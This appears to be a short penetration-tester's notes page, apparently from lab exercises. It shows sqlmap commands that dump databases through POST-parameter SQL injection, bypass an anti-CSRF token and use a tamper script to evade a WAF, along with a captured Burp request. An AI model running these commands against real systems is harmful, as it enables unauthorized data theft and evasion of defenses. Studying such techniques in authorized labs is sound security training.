POST REQUESTS

ANTI-CSRF TOKEN BYPASS

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - tokens
       - id=1&t0ken=AkU8r0F07g8TsHhG9WnkrNvOyrNJchXnWWbZlkZsZM

root@oco:~$ sqlmap -r reqCase8.txt --dump --batch --no-cast --random-agent --csrf-token="t0ken" --tamper=space2comment
 * --tamper is used when WAFs are identified during the initial scans

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - id=1

POST /case10.php HTTP/1.1
Host: 94.237.62.166:51433
Content-Length: 4
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.166:51433
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.166:51433/case10.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

id=1

root@oco:~$ sqlmap -r reqCase10.txt --batch --no-cast --random-agent

Last updated